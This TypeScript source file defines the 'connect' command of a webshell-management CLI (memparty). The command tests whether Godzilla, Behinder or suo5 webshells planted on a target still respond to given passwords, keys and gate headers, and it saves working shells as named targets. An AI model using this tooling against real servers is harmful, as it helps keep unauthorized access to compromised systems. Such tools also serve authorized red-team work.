import { Command, Option } from "commander";

import { logInfo, reportError, type GlobalOptions } from "../cli-context.js";
import { testBehinder } from "../connect/behinder.js";
import { testGodzilla } from "../connect/godzilla.js";
import { testSuo5, type Suo5Mode } from "../connect/suo5.js";
import type { CommonConnectOptions, ConnectTestResult } from "../connect/types.js";
import { logOp } from "../core/oplog.js";
import { autoSaveShell, resolveConnection } from "../core/targets.js";

interface ConnectCmdOptions extends GlobalOptions {
  url?: string;
  tool?: string;
  pass?: string;
  key?: string;
  headerName?: string;
  headerValue?: string;
  header?: string[];
  suo5Mode?: Suo5Mode;
  insecure?: boolean;
  json?: boolean;
  save?: boolean;
}

function parseExtraHeaders(lines: string[] | undefined): Record<string, string> {
  const headers: Record<string, string> = {};
  for (const line of lines ?? []) {
    const idx = line.indexOf(":");
    if (idx <= 0) {
      throw new Error(`invalid header ${JSON.stringify(line)}, expected "Name: value"`);
    }
    headers[line.slice(0, idx).trim()] = line.slice(idx + 1).trim();
  }
  return headers;
}

export function registerConnectCommand(program: Command): void {
  program
    .command("connect")
    .description(
      "Test whether a deployed webshell (Godzilla / Behinder / suo5) is alive and the credentials work",
    )
    .argument("[name]", "saved target name (see 'memparty list')")
    .option("-u, --url <url>", "URL of the deployed shell (or give a saved target name)")
    .addOption(
      new Option("-t, --tool <tool>", "shell tool").choices(["godzilla", "behinder", "suo5"]),
    )
    .option("--pass <pass>", "password (godzilla default: pass; behinder default: rebeyond)")
    .option("--key <key>", "godzilla key", "key")
    .option(
      "--header-name <name>",
      "gate header name reported by gen (shellToolConfig.headerName)",
    )
    .option(
      "--header-value <value>",
      "gate header value reported by gen (shellToolConfig.headerValue)",
    )
    .option("-H, --header <line...>", 'extra request header, e.g. -H "Cookie: a=b"')
    .addOption(
      new Option("--suo5-mode <mode>", "suo5 protocol variant")
        .choices(["auto", "v2", "v1"])
        .default("auto"),
    )
    .option("-k, --insecure", "skip TLS certificate verification")
    .option("--json", "output raw JSON")
    .option("--no-save", "do not auto-save the target after a successful test")
    .addHelpText(
      "after",
      `
Examples:
  $ memparty connect -u http://target/shell.jsp -t godzilla --pass pass --key key \\
      --header-value my-secret-token
  $ memparty connect -u http://target/shell.jsp -t behinder --pass rebeyond \\
      --header-value my-secret-token
  $ memparty connect -u http://target/suo5.jsp -t suo5
  $ memparty connect web222                       # saved target, see 'memparty list'
  $ memparty connect -u https://target/shell.jsp -t godzilla -k --json

Note: shells generated by MemShellParty check a gate header — copy
shellToolConfig.headerName/headerValue from the \`gen --json\` output
(default header name is "User-Agent"), or the shell stays silent.
A successful test auto-saves the profile as <host>/<tool> (skip with
--no-save); afterwards just pass the name. See 'memparty list',
'memparty note' and 'memparty remove' to manage saved targets.
`,
    )
    .action(async (name: string | undefined, opts: ConnectCmdOptions, cmd: Command) => {
      const globals = cmd.optsWithGlobals() as GlobalOptions & { timeout?: string };
      const timeoutMs = Number.parseInt(globals.timeout ?? "30000", 10);

      let conn;
      try {
        conn = resolveConnection(name, {
          url: opts.url,
          tool: opts.tool,
          pass: opts.pass,
          key: opts.key,
          headerName: opts.headerName,
          headerValue: opts.headerValue,
          extraHeaders: parseExtraHeaders(opts.header),
          insecure: opts.insecure,
        });
      } catch (err) {
        reportError(err instanceof Error ? err.message : String(err), opts.json ? ["--json"] : []);
        process.exitCode = 1;
        return;
      }

      const common: CommonConnectOptions = {
        headerName: conn.headerName,
        headerValue: conn.headerValue,
        extraHeaders: conn.extraHeaders,
        timeoutMs,
        insecure: conn.insecure,
      };

      let result: ConnectTestResult;
      switch (conn.tool) {
        case "godzilla":
          result = await testGodzilla(conn.url, conn.pass ?? "pass", conn.key ?? "key", common);
          break;
        case "behinder":
          result = await testBehinder(conn.url, conn.pass ?? "rebeyond", common);
          break;
        case "suo5":
          result = await testSuo5(conn.url, { ...common, mode: opts.suo5Mode });
          break;
        default:
          process.stderr.write(`Error: unknown tool ${String(conn.tool)}\n`);
          process.exitCode = 1;
          return;
      }

      // a successful handshake proves the credentials — keep them as a named target
      let savedAs: string | undefined;
      if (result.ok && conn.targetName === undefined && opts.save !== false) {
        savedAs = autoSaveShell(conn);
        conn.targetName = savedAs;
      }

      logOp({
        category: "connect",
        action: "connect",
        targetName: conn.targetName,
        url: conn.url,
        tool: conn.tool,
        ok: result.ok,
        durationMs: result.durationMs,
        detail: result.detail,
        error: result.error,
      });

      if (opts.json) {
        process.stdout.write(`${JSON.stringify({ ...result, savedAs }, null, 2)}\n`);
      } else if (result.ok) {
        process.stdout.write(`OK   ${result.tool} ${result.url}\n     ${result.detail ?? ""}\n`);
        if (savedAs) logInfo(`saved as '${savedAs}' (use --no-save to skip)`);
      } else {
        process.stderr.write(`FAIL ${result.tool} ${result.url}\n     ${result.error ?? ""}\n`);
      }
      if (!result.ok) {
        process.exitCode = 1;
      }
    });
}
